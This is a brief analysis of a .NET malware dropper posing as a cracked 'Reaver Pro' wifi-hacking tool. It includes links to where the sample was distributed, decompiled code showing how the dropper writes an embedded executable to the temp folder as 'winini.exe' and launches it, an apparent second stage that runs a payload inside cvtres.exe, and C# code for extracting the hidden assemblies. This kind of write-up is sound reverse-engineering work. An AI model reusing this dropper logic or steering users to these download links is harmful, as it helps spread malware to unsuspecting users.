.Net Malware Analyses

.Net Malware Analyses

Malicious download link:
http://downloadcsoftware.blogspot.ro/2014/09/download-reaver-pro-wifi-hack-full-crack.html
http://pasted.co/21439e76Do not execute the malware!private static void Main()
{
    Running = Assembly.Load(Dew("Bctlx.pryor.resources"));  // Dew method return bytes of assembly to be loaded
    Swagger("Scribe", new object[] { Dew("Myft.pryor.resources"), false, "winini.exe", true, 0 });
    while (Threads.Count > 0)
    {
        Threads.Dequeue().Join();
    }
}
On Swagger method:
private static void Swagger(string name, params object[] values)
{
    Thread item = new Thread(delegate {
        Type type = Running.GetType("Ax");
        foreach (MethodInfo info in type.GetMethods())
        {
            if (!(info.Name != name))
            {
                info.Invoke(null, values);
                break;
            }
        }
    });
    item.SetApartmentState(ApartmentState.STA);
    item.Start();
    Threads.Enqueue(item);
}You must set the flags of Type/Method ("Sheeit" type / "Dew" method) of to public in order to
be able to get them!
The C# code which decrypt these two assemblies:
string filename = "D:\\Reaver.exe";
AssemblyName an = null;
Assembly assembly = null;
Type Sheeit_type = null;
MethodInfo Dew_method = null;
try
{
an = AssemblyName.GetAssemblyName(filename);
assembly = Assembly.Load(an);
Sheeit_type = assembly.GetType("Sheeit");
Dew_method = Sheeit_type.GetMethod("Dew");
byte[] bytes = (byte[])Dew_method.Invoke(null,new object[]{"Bctlx.pryor.resources"});
File.WriteAllBytes("D:\\Bctlx.pryor.exe",bytes);
bytes = (byte[])Dew_method.Invoke(null,new object[]{"Myft.pryor.resources"});
File.WriteAllBytes("D:\\Myft.pryor.exe",bytes);
}
catch
{}
// Assembly Run, Version 0.0.0.0
Location: D:\Bctlx.pryor.exe
Type: "Ax" (see previous Swagger method - Type type = Running.GetType("Ax")
Method name = "Scribe" - ( see Swagger("Scribe" )public static void Scribe(byte[] bytes, bool rndName, string location, bool start, int TempAppData)
{
    if (rndName)
    {
        location = rndmkey(5).ToLower() + ".exe";
    }
    string path = Conversions.ToString(Interaction.IIf(TempAppData == 0, Path.GetTempPath() + location, Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData).Replace("Roaming", "") + location));
    while (File.Exists(path))
    {
        location = rndmkey(5).ToLower() + ".exe";
        path = Conversions.ToString(Interaction.IIf(TempAppData == 0, Path.GetTempPath() + location, Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData).Replace("Roaming", "") + location));
    }
    try
    {
        File.WriteAllBytes(path, bytes);
    }
    catch (Exception exception1)
    {
        ProjectData.SetProjectError(exception1);
        ProjectData.ClearProjectError();
    }
    if (start)
    {
        Process.Start(path, "cvtres.exe");
    }
}Scribe method will create the "winini.exe" file name (string location)
on the temporary directory with the bytes from Dew("Myft.pryor.resources")
After that will start the process using:
Process.Start Method (String, String)public static Process Start(
    string fileName,
    string arguments
)Myft.pryor.exe main exe look like this:
private static void Main()
{
    Running = Assembly.Load(Dew("Bctlx.pryor.resources"));
    Swagger("Begin", new object[] { "Windows Live", Path.Combine(Path.GetTempPath(), "winini.exe"), true });
    Swagger("Run", new object[] { "cvtres.exe", Dew("Myft.pryor.resources"), Dew("Wks.pryor.resources"), false });
    while (Threads.Count > 0)
    {
        Threads.Dequeue().Join();
    }
}
We again decompress these.
Myft.pryor(2).exe is packed with upx,
comment Remote Service Application,
original file name: MSRSAAP.EXE
http://www.herdprotect.com/msrsaap.exe-6b306e1b7996a339e082507f85fb1d5f59355bd3.aspx